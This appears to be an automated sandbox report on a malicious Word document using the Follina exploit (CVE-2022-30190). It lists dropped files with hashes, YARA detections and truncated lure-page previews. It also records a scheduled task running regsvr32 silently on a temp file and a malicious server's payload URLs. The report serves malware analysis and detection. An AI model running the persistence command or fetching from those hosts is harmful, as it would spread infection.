                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                      • Number of executed functions: 87
                                                                                                                                                                      • Number of non-executed functions: 76
                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                      • Found application associated with file extension: .docx
                                                                                                                                                                      • Adjust boot time
                                                                                                                                                                      • Enable AMSI
                                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                                      • Scroll down
                                                                                                                                                                      • Close Viewer
                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.38, 52.109.76.34, 52.109.12.23, 52.109.12.21, 52.109.12.22, 20.223.24.244
                                                                                                                                                                      • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
19:52:07 | Task Scheduler | Run new task: swyghewz path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"
Match | Associated Sample Name / URL | Detection | Context
185.234.247.119 | 68101181_048154.img | malicious | 185.234.247.119/1240405476.dat
185.234.247.119 | doc782.docx | malicious | 185.234.247.119/1676044147.dat
185.234.247.119 | doc782.docx | malicious | 185.234.247.119/123.RES
                                                                                                                                                                      No context
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      q1n36V9S8C.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      IhTREoj3J9.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      OYc1IC0G1F.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      wwEndQY5px.exeGet hashmaliciousBrowse
                                                                                                                                                                      • 185.234.247.35
                                                                                                                                                                      No context
Match: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll
Associated Sample Name / URL (Detection):
• 68101181_048154.img (malicious)
• doc782.docx (malicious)
• doc1712.docx (malicious)
• R346ltaP9w.rtf (malicious)
• VIP Invitation to Doha Expo 2023.docx (malicious)
• WykHEO9BQN.rtf (malicious)
• lol666 (2).bat (malicious)
• EISPv0c56U.doc (malicious)
• mjpoc_slide.doc (malicious)
• mjpoc_slide.doc (malicious)
• 05-2022-0438.doc (malicious)
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:Microsoft Access Database
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):528384
                                                                                                                                                                                            Entropy (8bit):0.475473229136101
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:hGfXQVJCC88SFyfZ0jGBtRe7JJWzwtZ1Ia+hVZO4Fg:kfX+ClHeZPaSz/5I
                                                                                                                                                                                            MD5:766811A42870AEE1D9D9EDC5CF39B751
                                                                                                                                                                                            SHA1:4CCD5DD755B159D32716FBBEECA2B33FC67B1466
                                                                                                                                                                                            SHA-256:88640A8D62914E568A7ADA112DCC06DED81028F1375883BC60575D8BEC2F20D7
                                                                                                                                                                                            SHA-512:B3CF99A75F5480D9FC6E60D2EBF0EABFC5C775CE7C7BDB7227D7A7149A63431BC2A602352A36B687D877410ECD661E044A22445ED2C96840A7AD439E90245E89
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):36
                                                                                                                                                                                            Entropy (8bit):2.730660070105504
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                                            MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                                            SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                                            SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                                            SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):64
                                                                                                                                                                                            Entropy (8bit):1.4172860556164644
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:GUfFF/FaV:DtFdu
                                                                                                                                                                                            MD5:C2AC3C4E2F040FECC0C759333329FC5F
                                                                                                                                                                                            SHA1:D60D4854A23808FD2D67A20DDD9001D5567B1F53
                                                                                                                                                                                            SHA-256:F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
                                                                                                                                                                                            SHA-512:5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:855271. Admin.
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):147863
                                                                                                                                                                                            Entropy (8bit):5.3589579589937095
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:PcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:OHQ9DQW+zIXLI
                                                                                                                                                                                            MD5:87FB26E1D0012B07EAFADBCA4DB26C9C
                                                                                                                                                                                            SHA1:A1BCD06085146F821F90C29449DDBD0F7AF9161D
                                                                                                                                                                                            SHA-256:9086C5DAAE4C97AEA27959F6B9B69482E9C61E1D9BCF29B8AEB8DEBEA50C60EA
                                                                                                                                                                                            SHA-512:F5F02C2C0180D115EF3A3B1BFD025BE299609A1029527349079BAA492B0521BA5E8255B7F38AC0F9FFC323352B549AAB220B3222D066D89A7702CCA29F6C2C2B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:50:06">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):2130
                                                                                                                                                                                            Entropy (8bit):1.1618571236537212
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:/9IqgHu42sarhYkIuvgB4PxZUtr1iI5lN24NLRnyOLfEznRnyOLflqDmPm1SXV5:mbb2sOhYk5vnZA5Rn/YnRn/doQ5
                                                                                                                                                                                            MD5:4F8C0EAC84D2D1AEEDABF24EF834DEFF
                                                                                                                                                                                            SHA1:7B75446CBB512AD6C13F12A35948E1548FD62864
                                                                                                                                                                                            SHA-256:8FB6FE075C6777639474427C864A13E5EAB1ECF7016DD1C23B9CA8FA7A7D0188
                                                                                                                                                                                            SHA-512:83839667E41A748A703F80D0CE533F37922433973EFC0949D34D2B3E7FFC8548A04682D97A1457CB7E92C667541EBB2BED0432A59084558A4BBE5E1CE8567494
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:....S.H.A.P.E. .X. .\.*. .M.E.R.G.E.F.O.R.M.A.T... . ...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................0...2...6...D...F...D...F...J...N...P.............................................................................................................................................................................................................................................................................................................................................................................................................................j....U....j....U...*....j....U
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1024
                                                                                                                                                                                            Entropy (8bit):0.05390218305374581
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                            • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                            • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, Author: Joe Security
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):6241
                                                                                                                                                                                            Entropy (8bit):4.836014560592255
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                                            MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                                            SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                                            SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                                            SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):9728
                                                                                                                                                                                            Entropy (8bit):4.79749305864191
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:WKqedmYoNKvUTCSH3gR8H8FgwSHwBnkwZYPaSJ365OOieMjQZa2RnIj2K:bElNK8TCSfHyPnkwZ+vKOBQZXn2
                                                                                                                                                                                            MD5:A3852564CA718AB40C68A255EEB0F8DF
                                                                                                                                                                                            SHA1:3A99D23AB2B157C0BD759FCA73047F8BB8611EF4
                                                                                                                                                                                            SHA-256:D05D1D1CAA819EEFFF6121EE9E746D96360EC76D8CFD77FFD8736CF9EFFCEB66
                                                                                                                                                                                            SHA-512:19134AB877F434B2564239218B5CB0865114D90E804673EE53980A685869134296A5347009E0AC37B43BB3E6D1E6FD821FC74EA65474BA2240DC687C1BB02F06
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                            File Type:MSVC .res
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):652
                                                                                                                                                                                            Entropy (8bit):3.1008166912794564
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryO+PfGak7Ynqq1+PfXPN5Dlq5J:+RI+ycuZhNt+akSKfPNnqX
                                                                                                                                                                                            MD5:CCEC6FC0B20BEA34F917C387969FA636
                                                                                                                                                                                            SHA1:03EC62AE92518E8478297BD1F7A197EF0D71E113
                                                                                                                                                                                            SHA-256:BE61BE9DA2757D7EE9A09F1C07D6B13D60515FFC7417BA6C3FC503A0094B499A
                                                                                                                                                                                            SHA-512:9656E5185B2A211A44200B19D59A3E810D02D7FEAD0BE833064D4CDF914C4808CFFD5F8B00B14FBCF31E2FE9DD54302E100E2045E9FE9C7C0F0EC8B469EB5698
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1364
                                                                                                                                                                                            Entropy (8bit):4.093180645604145
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:H7C9A+6UidkHKhKe3feI+ycuZhNt+akSKfPNnq9Wd:rLxdkAKe3m1ult+a3K9q9m
                                                                                                                                                                                            MD5:26E20DE969A81AD21D8C11428DD8D335
                                                                                                                                                                                            SHA1:D0B522B5F0B8C437683568C4ACC3CFFEF57F1196
                                                                                                                                                                                            SHA-256:6FA6A619B3D754E6ECBAF12B4801B98EE34B1E56DEA9C1942B118CF4B5393476
                                                                                                                                                                                            SHA-512:07D1DA0B64C34B3909CC2D890033647CA9120CE3778430D86736F4172F2DECEDF31C6FDA651840F747AB70B88C4ADBE764D85D3C6162495D780274253B9A1171
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP.................o....4......6..........5.......C:\Users\user\AppData\Local\Temp\RES1B1C.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.1.r.k.p.2.k.a...d.l.l.....(.....L.e.g.a.l.C.o.p.
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                                            Entropy (8bit):4.076886897377885
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:H53W9o66GFmkHphKe3feI+ycuZhNHakSZPNnq9Yld:d/+FjXKe3m1ulHa3bq9YP
                                                                                                                                                                                            MD5:437DD08072E93358CBBD0EB7C0176472
                                                                                                                                                                                            SHA1:77D262C59FBA3C6B4002A9E38C829376EF60635B
                                                                                                                                                                                            SHA-256:84B9F374AB5B62DACB0079B86C28D3648BB8917B7EB3C6CCAD847A7342E475F6
                                                                                                                                                                                            SHA-512:290832204B93C94B84575B54545F69FB245676081AF572BE70AB7D8C429AB0CB094744192340EEA8E6EE1C8E8EA96A65E9DFD9937FA5BE8FCFE3E7546E6F94AE
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:L......b.............debug$S........t...................@..B.rsrc$01........X.......X...........@..@.rsrc$02........P...b...............@..@........U....c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP....................&w.o...}...h............5.......C:\Users\user\AppData\Local\Temp\RES2969.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...a.s.a.o.m.m.z.3...d.l.l.....(.....L.e.g.a.l.C.
                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b2, 9 symbols
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1368
                                                                                                                                                                                            Entropy (8bit):4.087579112057223
                                                                                                                                                                                            Encrypted:false
